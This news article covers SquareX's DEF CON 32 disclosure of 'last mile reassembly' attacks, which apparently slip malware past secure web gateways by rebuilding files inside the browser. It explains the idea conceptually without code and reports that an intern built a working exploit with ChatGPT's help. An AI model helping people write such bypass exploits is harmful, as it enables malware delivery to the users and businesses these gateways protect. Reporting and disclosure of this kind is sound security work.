DEF CON 32: the unfixable bug that allows malware to be deployed via a browser


A fundamental vulnerability in secure web gateway (SWG) logic opens virtually any business, organization, or user to “last mile reassembly” attacks, which enable attackers to deploy malware on a device, SquareX researchers announced at the DEF CON 32 conference.

With cyber threats permeating the online world, enterprise protection tools have never been in greater demand. Millions of businesses worldwide rely on SWG vendors to provide exactly that – a guarantee that an employee or a user will not download a malicious file, which could lead to ransomware attacks, intellectual property theft, or loss of personal data.

Because of that, the SWG industry, which includes players like Cloudflare, Cisco, Palo Alto, Fortinet, and many others, is a multi-billion dollar business. However, Vivek Ramachandran, a cybersecurity veteran and SquareX’s founder, claims he has found a fundamental and easily exploitable flaw in how SWGs work.

Generally, SWGs scan all incoming and outgoing traffic and analyze the data on the cloud in real-time. If an SWG solution detects something fishy, it blocks the threat before it can reach the device. However, Ramachandran explained to Cybernews that there’s a catch: for an SWG to catch a threat, it has to be a file.

“The trigger for an SWG to work is a file download is happening. So, what if we could completely kill that chain where the SWG doesn't even know a file is being downloaded?” Ramachandran said.

Imagine you want to smuggle a dangerous item, like a pistol, to a location that doesn’t allow it. If you were trying to carry the whole item, security would very likely discover your payload. However, Ramachandran explained, if multiple individuals tried smuggling in only one part of the pistol, they’d be less likely to raise any alarms. Welcome to last mile reassembly.

“What we came up with was what if we could change every conventional attack like a file download, a file upload, a malicious website and recreate it to work and to be built entirely in the browser” Ramachandran explained.

According to him, his team managed to come up with a staggering 25 different bypasses of SWG protections from major solution providers, with every single one allowed to infect the target device via every popular web browser.

The kicker is that the vulnerability is not an oversight or something that can be patched with an update. Ramachandran explained that while SWGs can analyze the traffic, they’re completely blind to what is happening on the browser – a blind spot that SquareX researchers claim to have successfully exploited.

“The only way an SWG can detect last mile reassembly is if the browser state is being sent back to the cloud almost in a synchronized way. And to scale this for millions of requests is just not possible. And that's where we feel that these are architectural vulnerabilities, which no SWG can patch without changing their business model as the price would go up from like a dollar per user per month to $1,000 per user per month.” Ramachandran told Cybernews.

Exploited by an intern

What’s worse is that to carry out a last mile reassembly attack, the threat actor doesn’t need to be extremely sophisticated. This is not because the attack path is simple but because large language models reduce the bar necessary for attackers to cross over.

“I feel that a year back, I would have said that only attackers above a certain sophistication level could have exploited this. Maybe even going to state-sponsored attacker level. But now we have LLMs helping to code,” Ramachandran said.

To test their thesis, SquareX recruited an intern. The team told the person what the last mile reassembly attack was and instructed them to build an exploit. The outstanding part is, Ramachandran said, that after going back and forth with ChatGPT, the intern successfully devised an exploit.

“Writing code has become such a laughable, commoditized thing that doing that isn't an impediment at all. I didn’t have to write a single line of code. We just got an intern and described the attacks,” Ramachandran explained.

Meanwhile, he admitted, the SWG vendor’s reaction to Ramachandran’s findings was mixed. After being told about the vulnerability, some went silent, others acknowledged the issue was novel yet didn’t have a solution, and a third group claimed they had already been aware of the problem.

“Because SWG protection has kind of become an industry standard, everybody, including heads of security at companies, just takes it for granted. I think that's the bigger worry: if you aren't fully aware of the limitations of the technology stack you use,” Ramachandran said.